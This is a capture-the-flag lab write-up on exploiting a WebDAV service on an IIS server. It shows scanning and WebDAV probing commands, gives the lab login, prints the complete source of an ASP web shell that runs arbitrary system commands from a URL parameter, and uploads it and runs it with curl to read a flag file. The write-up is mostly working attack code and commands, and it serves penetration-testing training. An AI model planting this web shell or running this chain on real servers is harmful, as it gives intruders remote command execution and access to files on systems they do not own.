Windows: IIS Server DAVTest

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Exploit the WebDAV service and retrieve the flag!

The following username and password may be used to access the service:

Username	Password
bob	password_123321

Tools

• DAVTest

• Cadaver

• ASP Webshell

Writeup

nmap -p 80,443 --script http-webdav-scan demo.ine.local

davtest -url http://demo.ine.local/webdav -auth bob:password_123321

cadaver http://demo.ine.local/webdav
Username: bob  
Password: password_123321

<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>

put shell.asp

curl -u "bob:password_123321" "http://demo.ine.local/webdav/shell.asp?cmd=whoami"

curl -u "bob:password_123321" "http://demo.ine.local/webdav/shell.asp?cmd=type+C%3A%5Cflag.txt"